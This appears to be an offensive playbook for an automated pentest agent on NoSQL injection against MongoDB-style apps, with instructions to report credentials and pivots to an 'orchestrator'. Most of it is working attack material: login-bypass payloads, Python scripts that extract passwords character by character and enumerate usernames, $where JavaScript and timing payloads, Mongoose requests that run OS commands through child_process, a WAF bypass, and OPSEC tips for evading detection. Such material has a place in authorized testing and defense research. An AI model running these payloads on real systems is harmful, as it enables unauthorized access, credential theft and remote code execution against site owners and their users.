Nosql Injection

Your return summary must include:

• New targets/hosts discovered (with ports and services)
• New credentials or tokens found
• Access gained or changed (user, privilege level, method)
• Vulnerabilities confirmed (with status and severity)
• Pivot paths identified (what leads where)
• Blocked items (what failed and why, whether retryable)

Prerequisites

• An input processed by a NoSQL database (URL param, form field, JSON body, GraphQL variable, API parameter)
• Common indicators: MongoDB-style error messages (MongoError, $operator), JSON-based APIs, Node.js/Express backends, Mongoose ORM
• Burp Suite with NoSQLi Scanner extension (optional)

Step 1: Assess

If not already provided, determine:

1. Database — MongoDB (most common), CouchDB, or other
   • MongoDB: look for ObjectId, $operator in errors, Node.js stack
   • CouchDB: look for _rev, _id, Futon/Fauxton admin panels
2. Injection format — URL-encoded parameters or JSON body
   • URL params with array notation: param[$ne]=value
   • JSON body: {"param": {"$ne": "value"}}
3. Injection point — which parameter accepts operators
4. Response behavior — different content for true/false conditions?

Quick Detection Probes

URL-encoded (test each parameter):

param[$ne]=test
param[$gt]=
param[$exists]=true

JSON body:

{"param": {"$ne": "test"}}
{"param": {"$gt": ""}}
{"param": {"$exists": true}}

If the response changes (login succeeds, different content, different status code), the parameter accepts MongoDB operators.

Step 2: Authentication Bypass

The most common NoSQL injection — bypass login forms by injecting operators that make the query match any document.

URL-Encoded Bypass

# Match any username and password ($ne = not equal to garbage)
username[$ne]=toto&password[$ne]=toto

# Match all with regex
username[$regex]=.*&password[$regex]=.*

# Match any existing field
username[$exists]=true&password[$exists]=true

# Greater than empty string (matches everything)
username[$gt]=&password[$gt]=

# Target specific user with wildcard password
username=admin&password[$ne]=wrong

# Target admin with regex
username[$regex]=^admin&password[$ne]=wrong

JSON Body Bypass

{"username": {"$ne": null}, "password": {"$ne": null}}

{"username": {"$ne": ""}, "password": {"$ne": ""}}

{"username": {"$gt": ""}, "password": {"$gt": ""}}

{"username": "admin", "password": {"$ne": "wrong"}}

{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}

$or Bypass

{"username": "admin", "$or": [{"password": {"$ne": ""}}, {"password": {"$regex": ".*"}}]}

$in Operator — Enumerate Known Users

{"username": {"$in": ["admin", "root", "administrator", "Admin"]}, "password": {"$gt": ""}}

$nin — Exclude Known Users to Find Others

# Skip admin, find the next user
username[$nin][]=admin&password[$gt]=

Step 3: Blind Data Extraction

When operator injection works but data isn't directly reflected, extract values character by character using $regex.

Determine Field Length

# Test password length (adjust the number)
username=admin&password[$regex]=.{1}    # true if len >= 1
username=admin&password[$regex]=.{5}    # true if len >= 5
username=admin&password[$regex]=.{10}   # true if len >= 10
username=admin&password[$regex]=.{8}    # narrow down with binary search

Extract Value Character by Character

# Test first character
username=admin&password[$regex]=^a.*
username=admin&password[$regex]=^b.*
...
username=admin&password[$regex]=^m.*    # true — first char is 'm'

# Test second character
username=admin&password[$regex]=^ma.*
username=admin&password[$regex]=^mb.*
...
username=admin&password[$regex]=^md.*   # true — second char is 'd'

# Continue until full value extracted
username=admin&password[$regex]=^mdp$   # exact match confirms

Automated Blind Extraction — JSON POST

import requests
import string

url = "http://TARGET/login"
headers = {"Content-Type": "application/json"}
username = "admin"
password = ""
charset = string.ascii_letters + string.digits + string.punctuation

while True:
    found = False
    for c in charset:
        if c in ['*', '+', '.', '?', '|', '\\', '^', '$', '{', '}', '(', ')']:
            c = '\\' + c  # escape regex metacharacters
        payload = '{"username": "%s", "password": {"$regex": "^%s"}}' % (
            username, password + c)
        r = requests.post(url, data=payload, headers=headers,
                          allow_redirects=False)
        if r.status_code == 302 or 'dashboard' in r.text:
            password += c
            print(f"[+] Found: {password}")
            found = True
            break
    if not found:
        print(f"[*] Extracted password: {password}")
        break

Automated Blind Extraction — URL-Encoded POST

import requests
import string

url = "http://TARGET/login"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
username = "admin"
password = ""
charset = string.ascii_letters + string.digits + "_@{}-/()!$%=^[]:"

while True:
    found = False
    for c in charset:
        payload = f"user={username}&pass[$regex]=^{password + c}&login=submit"
        r = requests.post(url, data=payload, headers=headers,
                          allow_redirects=False)
        if r.status_code == 302:
            password += c
            print(f"[+] Found: {password}")
            found = True
            break
    if not found:
        print(f"[*] Extracted password: {password}")
        break

Enumerate Usernames

Discover unknown usernames by brute-forcing the username field:

import requests
import string

url = "http://TARGET/login"
charset = string.ascii_lowercase + string.digits + "_"

def extract_usernames(prefix=""):
    usernames = []
    for c in charset:
        payload = {"username": {"$regex": f"^{prefix + c}"},
                   "password": {"$regex": ".*"}}
        r = requests.post(url, json=payload, allow_redirects=False)
        if r.status_code == 302:
            for u in extract_usernames(prefix + c):
                usernames.append(u)
    if not usernames and prefix:
        usernames.append(prefix)
    return usernames

for user in extract_usernames():
    print(f"[+] Found username: {user}")

Step 4: Server-Side JavaScript ($where)

MongoDB's $where operator accepts JavaScript. If injection reaches a $where clause, it's equivalent to code execution within the database context.

$where Authentication Bypass

# SQL-style equivalents for $where context
' || 1==1//
' || 1==1%00
admin' || 'a'=='a

$where Data Extraction via Error

If the application reflects database errors:

{"$where": "this.username=='admin' && this.password=='x'; throw new Error(JSON.stringify(this));"}

Leaks the entire document (including password) in the error message.

$where Field Probing

# Check if password field exists
/?search=admin' && this.password%00

# Extract password character by character
/?search=admin' && this.password.match(/^a.*$/)%00
/?search=admin' && this.password.match(/^b.*$/)%00
...
/?search=admin' && this.password.match(/^mdp$/)%00

Time-Based Blind ($where)

When no response difference is visible:

';sleep(5000);'
';sleep(5000);+'
{"$where": "sleep(5000) || true"}

Loop-based delay (works when sleep() is disabled):

';it=new Date();do{pt=new Date();}while(pt-it<5000);'

If a 5-second delay is observed, $where execution is confirmed.

Mongoose RCE (CVE-2024-53900 / CVE-2025-23061)

Mongoose populate().match() forwards $where to Node.js instead of MongoDB, enabling OS command execution even when MongoDB's server-side JS is disabled:

# RCE via populate match
GET /posts?author[$where]=global.process.mainModule.require('child_process').execSync('id')

# Bypass for Mongoose 8.8.3-8.9.4 (nest under $or)
GET /posts?author[$or][0][$where]=global.process.mainModule.require('child_process').execSync('id')

Affects Mongoose <= 8.9.4. Fixed in 8.9.5 with sanitizeFilter: true.

Step 5: Advanced Techniques

Cross-Collection Access ($lookup)

If the injection reaches an aggregate() pipeline (not find()/findOne()), use $lookup to query other collections:

[
  {
    "$lookup": {
      "from": "users",
      "as": "leaked",
      "pipeline": [
        {
          "$match": {
            "password": {"$regex": "^.*"}
          }
        }
      ]
    }
  }
]

Returns documents from the users collection regardless of which collection the query originally targeted.

MongoLite Function Execution ($func)

PHP applications using Cockpit CMS (MongoLite library) support $func:

{"user": {"$func": "var_dump"}}

Executes arbitrary PHP functions with the field value as argument.

GraphQL Filter Injection

GraphQL resolvers that forward filter arguments to collection.find():

query {
  users(filter: { username: { "$ne": "" } }) {
    username
    email
  }
}

As a GraphQL variable:

{"f": {"$ne": {}}}

If the resolver does collection.find(args.filter) without sanitization, all documents are returned.

WAF Bypass — Duplicate Key

MongoDB uses the last value for duplicate keys:

{"username": "legitimate", "username": {"$ne": ""}, "password": {"$gt": ""}}

WAF validates the first username (legitimate string), MongoDB uses the second (operator injection).

Step 6: Escalate or Pivot

STOP and return to the orchestrator with:

• What was achieved (RCE, creds, file read, etc.)
• New credentials, access, or pivot paths discovered
• Context for next steps (platform, access method, working payloads)

OPSEC Notes

• Operator injection ($ne, $regex) generates standard queries — low detection risk in application logs
• $where payloads execute JavaScript server-side — may be logged by MongoDB profiler and trigger anomaly detection
• Blind extraction generates many requests (one per character) — use rate limiting in scripts to avoid detection
• sleep() in $where blocks the MongoDB thread — can cause performance issues on production systems
• Mongoose RCE payloads execute OS commands — visible in process monitoring

Troubleshooting

Operators Not Accepted

• Check Content-Type: JSON body needs application/json, URL-encoded needs application/x-www-form-urlencoded
• The app may use express-mongo-sanitize or strip $ prefixes — try without $: param[ne]=value (some frameworks add it back)
• Try nested objects: {"param": {"$ne": ""}} vs flat param[$ne]=
• The backend may use an ORM that validates types — try $exists which only needs a boolean

Blind Extraction Fails

• Regex metacharacters must be escaped: \(, \), \., \*, \+, \?
• Some characters break URL encoding — use JSON body instead
• If $regex is blocked, try $where with this.field.match()
• Response may not differ on true/false — check status code, response size, Set-Cookie headers, and redirect location

$where Blocked

• MongoDB 7.0+ disables server-side JavaScript by default (--noscripting)
• Try operator-only attacks ($ne, $regex, $gt) which don't need JS
• Check for Mongoose populate().match() path (CVE-2024-53900) which executes $where in Node.js, not MongoDB

Automated Tools

# NoSQLMap — automated enumeration and exploitation
python nosqlmap.py -u "http://TARGET/login" --httpmethod POST \
  --requestdata "username=test&password=test" --injparam username

# nosqli — Go-based scanner
nosqli scan -t "http://TARGET/login" -p username,password

# Burp: Extensions → NoSQLi Scanner → right-click request → "Scan for NoSQLi"